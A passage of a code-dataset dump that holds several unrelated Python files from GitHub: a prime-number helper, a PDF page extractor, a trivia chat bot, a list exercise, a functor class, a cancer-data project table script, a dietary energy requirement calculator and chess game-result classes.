\"\"\"Return count number of prime numbers, starting at 2.\n Assume list of integers for potential prime numbers goes to 100.\"\"\"\n\n if num_primes == 0:\n return []\n\n list_of_primes = []\n \n for i in range(2,101):\n if is_prime(i):\n list_of_primes.append(i)\n\n if len(list_of_primes) == num_primes:\n return list_of_primes\n\n\ndef is_prime(num):\n \"\"\"Returns True if number is prime\"\"\"\n factors = []\n\n for i in range(1,num+1):\n if num % i == 0:\n factors.append(i)\n\n if len(factors) > 2:\n return False\n return True\n\n\n\nif __name__ == '__main__':\n import doctest\n if doctest.testmod().failed == 0:\n print(\"\\n*** ALL TESTS PASSED. GREAT WORK!\\n\")\n","repo_name":"ciestupinan/coding-challenges","sub_path":"primes/primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17800845111","text":"from PyPDF2 import PdfFileReader, PdfFileWriter\r\n\r\n#파일명 받기\r\npath = str(input(\"What is the file name?-ex.test.pdf\\n\"))\r\n\r\npdfReader = PdfFileReader(path, \"rb\")\r\n\r\nnewpdfWriter = PdfFileWriter()\r\n\r\n#원하는 페이지 번호\r\nwhile True:\r\n pgnum = int(input(\"Which page do you want to extract?-if finished please type 0\\n\"))\r\n if pgnum==0:\r\n break\r\n newpdfWriter.addPage(pdfReader.getPage(pgnum))\r\n print(\"Added page number \"+str(pgnum)+\"\\n\")\r\n \r\n\r\n#저장 이름 설정\r\nnewfile = str(input(\"Please type the new file name - ex.test\\n\"))\r\n\r\nnewpdfWriter.write(open(\"./\"+newfile+\".pdf\", \"wb\"))\r\n\r\nprint(\"Saved successfully\")\r\n","repo_name":"hanbin07/PDF-extracter","sub_path":"PdfModify.py","file_name":"PdfModify.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"32161189644","text":"welcome = \"Hi! Let's put your trivia knowledge to the test. \" \\\r\n \"I bet you will ace it!\"\r\nsend_message(welcome)\r\ntrivia_quiz = [\r\n {\r\n\t\t\"question\": \"What is the name of Harry Potter's school?\",\r\n\t\t\"answer\": \"Hogwarts\"\r\n\t},\r\n\t{\r\n\t\t\"question\": \"Who was the first Disney Princess?\",\r\n\t\t\"answer\": \"Snow White\"\r\n\t},\r\n\t{\r\n\t \r\n\t # Add another \"question\" & \"answer\"\r\n\t \"question\": \"Who is Stefani Joanne Angelina Germanotta?\",\r\n\t \"answer\": \"Lady Gaga\"\r\n\t \r\n\t}\r\n]\r\n\r\n# Use a for to send all questions\r\nfor t in trivia_quiz:\r\n send_message(t[\"question\"])","repo_name":"crue-ton-school/code-monkey-chat-bot","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"40085114457","text":"\"\"\"\nList Exercise 3\n\nImplementieren Sie die Funktion except_for(), welche eine Kopie von 'my_list' zurückgibt, ohne dass die ausgeschlossenen\nElemente 'excluded' darin enthalten sind. Benutzen Sie die nachfolgenden Tests zur Kontrolle.\n\"\"\"\n\n\ndef except_for(my_list, excluded):\n result = []\n for element in my_list:\n if element not in excluded:\n result.append(element)\n return result\n\n\n# Tests\nprint(except_for([1, 2, 3, 4], [1, 2])) # -> [3, 4]\nprint(except_for([1, 2, 3, 2], [0, 2])) # -> [1, 3]\n","repo_name":"AndrasTarlos/s4f","sub_path":"py-basics/src/lectures/lists/exercise3.py","file_name":"exercise3.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"37745602633","text":"import functools\nimport operator\nfrom typing import (\n Callable, Tuple, Union, Optional, Callable,\n Type, TypeVar, Generic, Any, ClassVar\n)\nfrom abc import ABCMeta, abstractmethod, abstractproperty\n\nfrom .base import UnitMeta\n\n\n# Domain & Codomain: typecheckable Type objects.\n# For all actual concrete instances in the domain and codomain:\n# assert(isintance(domain_element, Domain) == True)\n# assert(isinstance(codomain_element), Codomain) == True)\n# Note - this is simplest & easiest when Domain and Codomain are\n# concrete classes (such as Scalar) - but they can be abstract types,\n# unions, or interfaces as well (such as numbers.Number).\nDomain = TypeVar('Domain')\nCodomain = TypeVar('Codomain')\nEitherDomain = Union[Domain, Codomain]\n# These two function signatures should be variant on number of arguments. IE\n# DomainFunction = Callable[Tuple[Domain, ...], Domain]\n# But Python 3.5 cannot handle this\n# So we do the best we can, which is:\nDomainFunction = Callable[[Domain], Domain]\nCodomainFunction = Callable[[Codomain], Codomain]\n\n\nclass Functor(Generic[Domain, Codomain], metaclass=ABCMeta):\n \"\"\"\n Takes two objects in the domain, and a function on those, and applies it.\n\n Note - this is *not* a monad - because it is not a container.\n It is intended for Scalar and other UnitsLeaf objects - which cannot\n contain other Scalar or UnitsLeaf objects.\n\n Note - technically this is an Invariant Functor - since it has the\n ability to construct and destruct.\n\n Abstracts:\n construct\n map\n \"\"\"\n Domain: ClassVar[Type[Domain]]\n Codomain: ClassVar[Type[Codomain]]\n\n def __init__(self, domain: Type[Domain], codomain: Type[Domain]):\n self.Domain = domain\n self.Codomain = codomain\n\n @abstractmethod\n def construct(self, domain: Domain) -> Codomain:\n return NotImplemented\n\n @abstractmethod\n def map(self, func: DomainFunction,\n *codomains: Tuple[Codomain, ...]) -> Codomain:\n return NotImplemented\n\n def lift(self, func: DomainFunction) -> CodomainFunction:\n @functools.wraps(func)\n def wrapper(*scalars: Tuple[Scalar, ...]) -> Scalar:\n return self.map(func, *scalars)\n return wrapper\n\n\nclass InvariantFunctor(Functor, Generic[Domain, Codomain], metaclass=ABCMeta):\n \"\"\"\n An InvariantFunctor is a Functor which can map in both directions,\n forward (Domain --> Codomain) and reverse (Codomain --> Domain).\n\n This allows us to implement map in terms of self.destruct.\n Note - this doesn't work in general - but it *does* work for our\n use-case (Scalar wrapping Number).\n\n This Functor presumes that it's Domain and Codomain are non-overlapping.\n If not, the 'apply' function may have incorrect behavior.\n\n Abstracts:\n destruct\n construct\n \"\"\"\n @abstractmethod\n def destruct(self, codomain: Codomain) -> Domain:\n \"\"\"Inverse of 'construct'. Translates codomain elements into domain.\"\"\"\n return NotImplemented\n\n def delift(self, func: CodomainFunction) -> DomainFunction:\n @functools.wraps(func)\n def wrapper(*domains: Tuple[Domain, ...]) -> Domain:\n return func(\n *tuple(self.destruct(elm) for elm in domains)\n )\n return wrapper\n\n def map(self, func: DomainFunction,\n *codomains: Tuple[Codomain, ...]) -> Codomain:\n return self.construct(\n func(\n *tuple(self.destruct(arg) for arg in codomains)\n )\n )\n\n def demap(self, func: CodomainFunction,\n *domains: Tuple[Domain, ...]) -> Domain:\n return self.destruct(\n func(\n *tuple(self.construct(arg) for arg in domains)\n )\n )\n\n def bind(self, func: DomainFunction,\n *values: Tuple[EitherDomain, ...]) -> Codomain:\n \"\"\"\n The .map function, but dispatches on category, so elements of codomain are\n destructed into the domain before mapping.\n\n Warning - this implementation of 'bind' depends on the\n Domain and Codomain to be non-overlapping.\n\n Allows functions to take either domain or codomain elements.\n Thus, statements like this can work:\n Unit(5) + 4\n Unit(5) + Unit(4)\n\n\n I *just* realized that this is just another way to implement 'bind'...\n ... renaming it now\n \"\"\"\n _domains = tuple(\n value if isinstance(value, self.Domain)\n else self.destruct(value)\n for value in values\n )\n # _values = tuple(value if not isinstance(value, self.Codomain)\n # else self.destruct(value)\n # for value in values)\n return self.construct(func(*_domains))\n","repo_name":"OaklandPeters/py-arithmetic-units","sub_path":"py_units/functor.py","file_name":"functor.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"44680452284","text":"import time\n\nexecute = True\nclear_screen = '\\n'*50\nsep = '-='*15\ntable = '-'*10\nidade = 0\nidades = ['anos', 'meses']\naltura = 0\npeso = 0\nage_type = None\nsexo = None\ncond = None\neer = 0\n\nwhile execute:\n print(clear_screen, sep)\n print(f'\\n\\tValores:\\n\\n\\t{table}\\n\\tPeso: {peso} kg\\n\\t{table}\\n\\tAltura: {altura} cm\\n\\t{table}\\n\\tIdade: {idade} {age_type}\\n\\t{table}\\n\\tSexo: {sexo}\\n\\t{table}\\n\\tCondição: {cond}\\n\\t{table}')\n print('\\n\\n\\tEscolha uma opção')\n print('\\n\\t[0] Alterar valores\\n\\t[1] Calcular EER\\n\\n\\t[ENTER] Sair\\n\\n')\n print(sep)\n opt = input('\\n...')\n if opt == '':\n print(clear_screen)\n execute = False\n elif opt == '0':\n selection = True\n while selection:\n print(clear_screen, sep)\n print(f'\\n\\tValores:\\n\\n\\t{table}\\n\\tPeso: {peso} kg\\n\\t{table}\\n\\tAltura: {altura} cm\\n\\t{table}\\n\\tIdade: {idade} {age_type}\\n\\t{table}\\n\\tSexo: {sexo}\\n\\t{table}\\n\\tCondição: {cond}\\n\\t{table}')\n print('\\n\\tEscolha alguma opção para alterar:\\n\\n\\t[0] Peso\\n\\t[1] Altura\\n\\t[2] Idade\\n\\t[3] Tipo de idade\\n\\t[4] Sexo\\n\\t[5] Condição\\n\\n\\t[ENTER] Sair\\n\\n')\n print(sep)\n choosen = input('...')\n if choosen == '':\n if age_type not in idades:\n age_type = None\n print(clear_screen, sep)\n print('\\nINSIRA UMA OPÇÃO VÁLIDA DE IDADE\\n')\n print(sep)\n time.sleep(2)\n else:\n selection = False\n elif choosen == '0':\n print(clear_screen, sep)\n peso = input(f'\\tPeso: {peso}\\n\\n\\tInsira um novo peso:\\n{sep}\\n...')\n elif choosen == '1':\n print(clear_screen, sep)\n altura = input(f'\\tAltura: {altura}\\n\\n\\tInsira uma nova altura:\\n{sep}\\n...')\n elif choosen == '2':\n print(clear_screen, sep)\n idade = input(f'\\tIdade: {idade}\\n\\n\\tInsira uma nova idade:\\n{sep}\\n...')\n elif choosen == '3':\n print(clear_screen, sep)\n age_type = input(f'\\tTipo de idade: {age_type}\\n\\n\\tInsira um novo tipo de idade (meses ou anos):\\n{sep}\\n...')\n elif choosen == '4':\n print(clear_screen, sep)\n sexo = input(f'\\tSexo: {sexo}\\n\\n\\tInsert a new sex (M or F):\\n{sep}\\n...')\n elif choosen == '5':\n print(clear_screen, sep)\n cond = input(f'\\tCondição: {cond}\\n\\n\\tInsira uma nova condição (s: sedentario, p: pouco ativo, a: ativo, m: muito ativo):\\n{sep}\\n...')\n elif opt == '1':\n if age_type == 'meses':\n if float(idade) < 2.99:\n if sexo == \"M\":\n eer = -716.45-(1.00 * float(idade)) + (17.82 * float(altura)) + (15.06 * float(peso)) + 200\n elif sexo == 'F':\n eer = -69.15-(80.00 * float(idade)) + (2.65 * float(altura)) + (56.15 * float(peso)) + 180\n elif float(idade) < 6:\n if sexo == \"M\":\n eer = -716.45-(1.00 * float(idade)) + (17.82 * float(altura)) + (15.06 * float(peso)) + 50\n elif sexo == 'F':\n eer = -69.15-(80.00 * float(idade)) + (2.65 * float(altura)) + (54.15 * float(peso)) + 60\n elif float(idade) > 36:\n if sexo == \"M\":\n eer = -716.45-(1.00 * float(idade)) + (17.82 * float(altura)) + (15.06 * float(peso)) + 20\n elif sexo == 'F':\n if float(idade) < 12:\n eer = -69.15-(80.00 * float(idade)) + (2.65 * float(altura)) + (54.15 * float(peso)) + 20\n if float(idade) >= 12:\n eer = -69.15-(80.00 * float(idade)) + (2.65 * float(altura)) + (54.15 * float(peso)) + 15\n elif age_type == 'anos':\n if float(idade) < 19:\n if sexo == 'M':\n if float(idade) > 3:\n if cond == 's':\n eer = -447.51 + (3.68 * float(idade)) + (13.01 * float(altura)) + (13.15 * float(peso)) + 20\n elif cond == 'p':\n eer = 19.12 + (3.68 * float(idade)) + (8.62 * float(altura)) + (20.28 * float(peso)) + 20\n elif cond == 'a':\n eer = -388.19 + (3.68 * float(idade)) + (12.66 * float(altura)) + (20.46 * float(peso)) + 20\n elif cond == 'm':\n eer = -671.75 + (3.68 * float(idade)) + (15.38 * float(altura)) + (23.25 * float(peso)) + 20\n if float(idade) > 8:\n if cond == 's':\n eer = -447.51 + (3.68 * float(idade)) + (13.01 * float(altura)) + (13.15 * float(peso)) + 15\n elif cond == 'p':\n eer = 19.12 + (3.68 * float(idade)) + (8.62 * float(altura)) + (20.28 * float(peso)) + 15\n elif cond == 'a':\n eer = -388.19 + (3.68 * float(idade)) + (12.66 * float(altura)) + (20.46 * float(peso)) + 15\n elif cond == 'm':\n eer = -671.75 + (3.68 * float(idade)) + (15.38 * float(altura)) + (23.25 * float(peso)) + 15\n if float(idade) > 13:\n if cond == 's':\n eer = -447.51 + (3.68 * float(idade)) + (13.01 * float(altura)) + (13.15 * float(peso)) + 25\n elif cond == 'p':\n eer = 19.12 + (3.68 * float(idade)) + (8.62 * float(altura)) + (20.28 * float(peso)) + 25\n elif cond == 'a':\n eer = -388.19 + (3.68 * float(idade)) + (12.66 * float(altura)) + (20.46 * float(peso)) + 25\n elif cond == 'm':\n eer = -671.75 + (3.68 * float(idade)) + (15.38 * float(altura)) + (23.25 * float(peso)) + 25\n else:\n if cond == 's':\n eer = -447.51 + (3.68 * float(idade)) + (13.01 * float(altura)) + (13.15 * float(peso)) + 20\n elif cond == 'p':\n eer = 19.12 + (3.68 * float(idade)) + (8.62 * float(altura)) + (20.28 * float(peso)) + 20\n elif cond == 'a':\n eer = -388.19 + (3.68 * float(idade)) + (12.66 * float(altura)) + (20.46 * float(peso)) + 20\n elif cond == 'm':\n eer = -671.75 + (3.68 * float(idade)) + (15.38 * float(altura)) + (23.25 * float(peso)) + 20\n elif sexo == \"F\":\n if float(idade) > 8:\n if cond == 's':\n eer = 55.59 - (22.25 * float(idade)) + (8.43 * float(altura)) + (17.07 * float(peso)) + 15\n elif cond == 'p':\n eer = -297.54 - (22.25 * float(idade)) + (12.77 * float(altura)) + (14.73 * float(peso)) + 15\n elif cond == 'a':\n eer = -189.55 - (22.25 * float(idade)) + (11.74 * float(altura)) + (18.34 * float(peso)) + 15\n elif cond == 'm':\n eer = -709.59 - (22.25 * float(idade)) + (18.22 * float(altura)) + (14.25 * float(peso)) + 15\n elif float(idade) > 13:\n if cond == 's':\n eer = 55.59 - (22.25 * float(idade)) + (8.43 * float(altura)) + (17.07 * float(peso)) + 30\n elif cond == 'p':\n eer = -297.54 - (22.25 * float(idade)) + (12.77 * float(altura)) + (14.73 * float(peso)) + 30\n elif cond == 'a':\n eer = -189.55 - (22.25 * float(idade)) + (11.74 * float(altura)) + (18.34 * float(peso)) + 30\n elif cond == 'm':\n eer = -709.59 - (22.25 * float(idade)) + (18.22 * float(altura)) + (14.25 * float(peso)) + 30\n else:\n if cond == 's':\n eer = 55.59 - (22.25 * float(idade)) + (8.43 * float(altura)) + (17.07 * float(peso)) + 20\n elif cond == 'p':\n eer = -297.54 - (22.25 * float(idade)) + (12.77 * float(altura)) + (14.73 * float(peso)) + 20\n elif cond == 'a':\n eer = -189.55 - (22.25 * float(idade)) + (11.74 * float(altura)) + (18.34 * float(peso)) + 20\n elif cond == 'm':\n eer = -709.59 - (22.25 * float(idade)) + (18.22 * float(altura)) + (14.25 * float(peso)) + 20\n elif float(idade) >= 19:\n if sexo == 'M':\n if cond == 's':\n eer = 753.07 - (10.83 * float(idade)) + (6.50 * float(altura)) + (14.10 * float(peso))\n elif cond == 'p':\n eer = 581.47 - (10.83 * float(idade)) + (8.30 * float(altura)) + (14.94 * float(peso))\n elif cond == 'a':\n eer = 1004.82 - (10.83 * float(idade)) + (6.52 * float(altura)) + (15.91 * float(peso))\n elif cond == 'm':\n eer = -517.88 - (10.83 * float(idade)) + (15.61 * float(altura)) + (19.11 * float(peso))\n elif sexo == \"F\":\n if cond == 's':\n eer = 584.90 - (7.01 * float(idade)) + (5.72 * float(altura)) + (11.71 * float(peso))\n elif cond == 'p':\n eer = 575.77 - (7.01 * float(idade)) + (6.60 * float(altura)) + (12.14 * float(peso))\n elif cond == 'a':\n eer = 710.25 - (7.01 * float(idade)) + (6.54 * float(altura)) + (12.34 * float(peso))\n elif cond == 'm':\n eer = 511.83 - (7.01 * float(idade)) + (9.07 * float(altura)) + (12.56 * float(peso))\n\n print(clear_screen, sep)\n print(f'\\n\\tSeu EER:\\n\\t{round(eer, 2)} kcal/dia\\n')\n print(sep)\n option = input('\\n\\nAperte ENTER para voltar ao menu')\n","repo_name":"Zac-Milioli/Code_Testing_and_General_Functions","sub_path":"GeneralPython/Miscelaneous/EER_calculator.py","file_name":"EER_calculator.py","file_ext":"py","file_size_in_byte":10286,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"5091345686","text":"#!/usr/bin/env python3\n\nimport re\n\nfrom os import path\n\nfrom cda_etl.lib import load_tsv_as_dict, map_columns_one_to_many, map_columns_one_to_one, sort_file_with_header\n\n# PARAMETERS\n\ninput_dir = path.join( 'extracted_data', 'gdc', 'projects', 'tsv' )\n\ninput_data = {\n \n 'program' : load_tsv_as_dict( path.join( input_dir, 'program.tsv' ) ),\n 'project' : load_tsv_as_dict( path.join( input_dir, 'project.tsv' ) ),\n 'project_in_program' : map_columns_one_to_many( path.join( input_dir, 'project_in_program.tsv' ), 'program_id', 'project_id' ),\n 'project_studies_disease_type' : map_columns_one_to_many( path.join( input_dir, 'project_studies_disease_type.tsv' ), 'project_id', 'disease_type' ),\n 'project_studies_primary_site' : map_columns_one_to_many( path.join( input_dir, 'project_studies_primary_site.tsv' ), 'project_id', 'primary_site' )\n}\n\noutput_dir = path.join( 'auxiliary_metadata', '__project_crossrefs' )\n\noutput_file = path.join( output_dir, 'GDC_all_programs_and_projects.tsv' )\n\noutput_fields = [\n \n 'program.program_id',\n 'program.name',\n 'program.dbgap_accession_number',\n 'project.project_id',\n 'project.name',\n 'project.dbgap_accession_number',\n 'project.disease_types_studied',\n 'project.primary_sites_studied'\n]\n\n# EXECUTION\n\nwith open( output_file, 'w' ) as OUT:\n \n print( *output_fields, sep='\\t', end='\\n', file=OUT )\n\n for program_id in sorted( input_data['program'] ):\n \n program_name = input_data['program'][program_id]['name']\n program_dbgap_accession_number = input_data['program'][program_id]['dbgap_accession_number']\n\n for project_id in sorted( input_data['project_in_program'][program_id] ):\n \n project_name = input_data['project'][project_id]['name']\n project_dbgap_accession_number = input_data['project'][project_id]['dbgap_accession_number']\n\n disease_type_string = '[]'\n\n if project_id in input_data['project_studies_disease_type']:\n \n disease_types = list()\n\n for disease_type in sorted( input_data['project_studies_disease_type'][project_id] ):\n \n disease_type = re.sub( r',', r'\\,', disease_type )\n disease_type = re.sub( r\"'\", r\"\\'\", disease_type )\n\n disease_types.append( disease_type )\n\n disease_type_string = r\"['\" + \"', '\".join( disease_types ) + r\"']\"\n\n primary_site_string = '[]'\n\n if project_id in input_data['project_studies_primary_site']:\n \n primary_sites = list()\n\n for primary_site in sorted( input_data['project_studies_primary_site'][project_id] ):\n \n primary_site = re.sub( r',', r'\\,', primary_site )\n primary_site = re.sub( r\"'\", r\"\\'\", primary_site )\n\n primary_sites.append( primary_site )\n\n primary_site_string = r\"['\" + \"', '\".join( primary_sites ) + r\"']\"\n\n print( *[ program_id, program_name, program_dbgap_accession_number, project_id, project_name, project_dbgap_accession_number, disease_type_string, primary_site_string ], sep='\\t', end='\\n', file=OUT )\n\n\n","repo_name":"CancerDataAggregator/transform","sub_path":"python_package/src/cda_etl/auxiliary_scripts/104_enumerate_gdc_program_project_hierarchy.py","file_name":"104_enumerate_gdc_program_project_hierarchy.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"38451843372","text":"n = int(input())\nL = list(map(int,input().split()))\nlim = (250,275,300,301)\n\nans = []\nfor i in L:\n for j in range(4):\n if i < lim[j]:\n ans.append(4-j)\n break\nprint(*ans)","repo_name":"LightPotato99/baekjoon","sub_path":"0_Competitions/utilcup1/A_previousLevel.py","file_name":"A_previousLevel.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13214258033","text":"import re\nfrom collections import namedtuple\n\nfrom solentware_misc.core.null import Null\n\nfrom .gameresults import (\n displayresult,\n home_player_pieces,\n displayresulttag,\n resultmap,\n match_score_difference,\n match_score_total,\n)\nfrom . import constants\n\n_GRADE_ONLY_TAG = {\n True: \"grading only\",\n}\n\n# Grading code is [0-9]{6}[A-M] but accept [0-9]{3} embedded in a word to allow\n# for a one character typo in the grading code or a one character digit typo in\n# the name.\n# This also catches ECF Membership numbers, 3-digit ECF grades, and 4-digit\n# ratings; although the tolerance for typing errors is less.\n# Text in brackets containing a digit are treated as a code: '(UG est 170)' for\n# example. The '{}', '[]', and '<>', pairs are not treated as codes at present\n# because they do not survive till code_in_name is used.\ncode_in_name = re.compile(r\"\\([^0-9]*[0-9].*?\\)|\\s*[^\\s]*[0-9]{3}[^\\s]*\\s*\")\n\n\nclass GameObjectsError(Exception):\n \"\"\"Exception class for gameobjects module.\"\"\"\n\n\ndef split_codes_from_name(name_and_codes):\n \"\"\"Return tuple(name, set(codes)) from name_and_codes.\"\"\"\n codes = set(s.strip() for s in code_in_name.findall(name_and_codes))\n name = \" \".join(\n [s.strip() for s in code_in_name.split(name_and_codes)]\n ).strip()\n return (name, codes)\n\n\nclass MatchFixture:\n \"\"\"Detail of a fixture extracted from a fixture list file.\"\"\"\n\n attributes = {\n \"competition\": None,\n \"source\": None,\n \"round\": None,\n \"hometeam\": None,\n \"awayteam\": None,\n \"date\": None,\n \"day\": None,\n \"pdate\": None,\n \"dateok\": None,\n }\n\n def __init__(self, tagger=None, **kargs):\n \"\"\"Override, set default values for .attributes not in kargs.\"\"\"\n self.__dict__[\"tagger\"] = tagger\n for attribute in kargs:\n if attribute not in self.__class__.attributes:\n raise AttributeError(attribute)\n self.__dict__.update(self.attributes)\n self.__dict__.update(kargs)\n\n def __eq__(self, other):\n \"\"\"Return True if self[a]==other[a] for MatchFixture.attributes.\"\"\"\n for attribute in MatchFixture.attributes:\n if self.__dict__[attribute] != other.__dict__[attribute]:\n return False\n return True\n\n def __setattr__(self, name, value):\n \"\"\"Allow self[name] = value if name is in .attributes.\"\"\"\n if name in self.__class__.attributes:\n self.__dict__[name] = value\n else:\n raise AttributeError(name)\n\n def __hash__(self):\n \"\"\"Return object identity as hash value.\"\"\"\n return id(self)\n\n\nclass Game:\n \"\"\"Detail of a game result extracted from event report.\"\"\"\n\n attributes = {\n \"result\": None,\n \"date\": None,\n \"homeplayerwhite\": None, # True|False|None. None means \"not known\"\n \"homeplayer\": None, # the leftmost player in \"Smith 1-0 Jones\" etc\n \"awayplayer\": None, # the rightmost player in \"Smith 1-0 Jones\" etc\n \"gradegame\": True, # True|False. True means store result for grading\n }\n\n def __init__(self, tagger=None, **kargs):\n \"\"\"Override, set default values for .attributes not in kargs.\"\"\"\n # SLMatchGame sets gradegame to False if homeplayer or awayplayer is\n # default. Should that come here or should caller be responsible for\n # setting gradegame argument. Round by round swiss results, not match\n # games, may say something like 'J Smith 1-0 default' too.\n self.__dict__[\"tagger\"] = tagger\n for attribute in kargs:\n if attribute not in self.__class__.attributes:\n raise AttributeError(attribute)\n self.__dict__.update(self.attributes)\n self.__dict__.update(kargs)\n\n def __eq__(self, other):\n \"\"\"Return True if self[a] == other[a] for a in Game.attributes.\"\"\"\n for attribute in self.__class__.attributes:\n if self.__dict__[attribute] != other.__dict__[attribute]:\n return False\n return True\n\n def __ne__(self, other):\n \"\"\"Return True if self[a] != other[a] for a in Game.attributes.\"\"\"\n for attribute in self.__class__.attributes:\n if self.__dict__[attribute] != other.__dict__[attribute]:\n return True\n return False\n\n def __setattr__(self, name, value):\n \"\"\"Allow self[name] = value if name is in .attributes.\"\"\"\n if name in self.__class__.attributes:\n self.__dict__[name] = value\n else:\n raise AttributeError(name)\n\n def __hash__(self):\n \"\"\"Return object identity as hash value.\"\"\"\n return id(self)\n\n @staticmethod\n def game_result_exists(result):\n \"\"\"Return True if game result is allowed.\"\"\"\n return result in resultmap\n\n def get_print_result(self):\n \"\"\"Return (, ).\n\n Typically returns ('', 'unfinished') where match report includes an\n unfinished game\n\n \"\"\"\n return (\n displayresult.get(self.result, \"\"),\n displayresulttag.get(self.result, \"\"),\n )\n\n def is_inconsistent(self, other, problems):\n \"\"\"Return True if attribute values of self and other are inconsistent.\n\n Used to check that duplicate reports of a game are consistent allowing\n for previously unknown detail to be added. Such as the result of an\n unfinished game.\n\n \"\"\"\n state = False\n if self.homeplayer.is_inconsistent(other.homeplayer, problems):\n problems.add(constants.HOME_PLAYER)\n state = True\n if self.awayplayer.is_inconsistent(other.awayplayer, problems):\n problems.add(constants.AWAY_PLAYER)\n state = True\n if self.homeplayerwhite != other.homeplayerwhite:\n if other.homeplayer:\n problems.add(constants.HOME_PLAYER_WHITE)\n state = True\n if self.result != other.result:\n if other.result:\n problems.add(constants.RESULT_DUP_REP)\n state = True\n return state\n\n @staticmethod\n def get_game_board_and_round():\n \"\"\"Return tuple of \"\"s for game details in tabular format.\"\"\"\n return (\"\",) * 2\n\n\nclass MatchGame(Game):\n \"\"\"Detail of a game result extracted from a file of match reports.\n\n MatchGame.attributes is Game.attributes plus board\n\n \"\"\"\n\n # PDLRapidplayMatchGame is not used because each game is reported in full.\n # The problem is interpreting scores like 1-1. Is that two draws or one\n # win by each player, and who had white pieces in each game? The result\n # '1.5-0.5' retains the white pieces question.\n # See Game for notes on SLMatchGame.\n\n attributes = {\n \"board\": None,\n \"gradingonly\": None,\n }\n attributes.update(Game.attributes)\n\n def is_inconsistent(self, other, problems):\n \"\"\"Add board and gradingonly to attributes checked for consistency.\"\"\"\n state = False\n if self.board != other.board:\n if other.board:\n problems.add(constants.BOARD_DUP_REP)\n state = True\n if self.gradingonly != other.gradingonly:\n problems.add(constants.GRADING_ONLY)\n state = True\n i = super().is_inconsistent(other, problems)\n return i or state\n\n def is_game_counted_in_match_score(self):\n \"\"\"Return True if game is not 'for grading only'.\"\"\"\n return not self.gradingonly\n\n def get_print_result(self):\n \"\"\"Return (, ).\n\n Typically returns ('', 'unfinished') where match report includes an\n unfinished game\n\n \"\"\"\n return (\n displayresult.get(self.result, \"\"),\n displayresulttag.get(\n self.result,\n \"\" if self.result in displayresult else \"invalid result\",\n ),\n _GRADE_ONLY_TAG.get(self.gradingonly, \"\"),\n )\n\n def get_game_board_and_round(self):\n \"\"\"Return tuple(self.board, \"\"0 for game details in tabular format.\"\"\"\n return (self.board, \"\")\n\n\nclass UnfinishedGame(MatchGame):\n \"\"\"Detail of a completed match game originally reported unfinished.\"\"\"\n\n # A merge of pdlcollation.UnfinishedGame and slcollation.SLMatchGame is\n # used. The PDL version has the right superclass but the game_result\n # method is broken. (And much later removed because it is not used.)\n # The gameresult constant is copied from slcollation to an upper case name.\n # UnfinishedGame in slcollation is not a subclass of SLMatchGame to leave\n # out the gradingonly attribute, but that attribute has been added to Game.\n # (Also removed when game_result method removed.)\n\n attributes = {\n \"source\": None,\n \"section\": None,\n \"competition\": None,\n \"hometeam\": None,\n \"awayteam\": None,\n }\n attributes.update(MatchGame.attributes)\n\n def is_inconsistent(self, other, problems):\n \"\"\"Extend to compare PDL attributes. Return True if inconsistent.\"\"\"\n state = False\n if self.source != other.source:\n problems.add(constants.SOURCE_DUP_REP)\n state = True\n if self.section != other.section:\n problems.add(constants.SECTION)\n state = True\n if self.competition != other.competition:\n problems.add(constants.COMPETITION_DUP_REP)\n state = True\n if self.hometeam != other.hometeam:\n problems.add(constants.HOME_TEAM_NAME)\n state = True\n if self.awayteam != other.awayteam:\n problems.add(constants.AWAY_TEAM_NAME)\n state = True\n\n # The MatchGame notion for consistency of board may not be reliable for\n # unfinished game reports if the board has been calculated from it's\n # position in the report.\n # In other words, the problem is what we are told about the game, not\n # whether UnfinishedGame should be a subclass of MatchGame.\n # Actually the best name for this class is UnfinishedMatchGame because\n # it is possible for individual games to be unfinished. Such games are\n # almost always not reported at all until they are finished.\n # Better would be a separate class for defaulted games, as it seems to\n # be use of UnfinishedGame for those which first caused the problem.\n if self.homeplayer.is_inconsistent(other.homeplayer, problems):\n problems.add(constants.HOME_PLAYER)\n state = True\n if self.awayplayer.is_inconsistent(other.awayplayer, problems):\n problems.add(constants.AWAY_PLAYER)\n state = True\n\n # Surely wrong to do this now, or in pre problems argument code.\n # if (self.homeplayerwhite == other.homeplayerwhite and\n # self.result == other.result and\n # self.gradingonly == other.gradingonly):\n # return state\n\n for game in (self, other):\n for player in (game.homeplayer, game.awayplayer):\n if not isinstance(player, Null):\n if self.result != other.result:\n if other.result:\n problems.add(constants.RESULT_DUP_REP)\n state = True\n return state\n\n\nclass SwissGame(Game):\n \"\"\"Detail of a game result extracted from a file of swiss reports.\n\n SwissGame.attributes is Game.attributes plus round\n\n \"\"\"\n\n attributes = {\n \"round\": None,\n }\n attributes.update(Game.attributes)\n\n def is_inconsistent(self, other, problems):\n \"\"\"Extend, add round to the attributes checked to return True.\"\"\"\n state = False\n if self.round != other.round:\n if other.round:\n problems.add(constants.ROUND_DUP_REP)\n state = True\n i = super().is_inconsistent(other, problems)\n return i or state\n\n def get_game_board_and_round(self):\n \"\"\"Return tuple(\"\", self.round) for game details in tabular format.\"\"\"\n return (\"\", self.round)\n\n\nclass SwissMatchGame(Game):\n \"\"\"Detail of a game result extracted from a file of swiss match reports.\n\n SwissMatchGame.attributes is Game.attributes plus board and round\n\n \"\"\"\n\n attributes = {\n \"board\": None,\n \"round\": None,\n }\n attributes.update(Game.attributes)\n\n def is_inconsistent(self, other, problems):\n \"\"\"Extend, add board round to the attributes checked to return 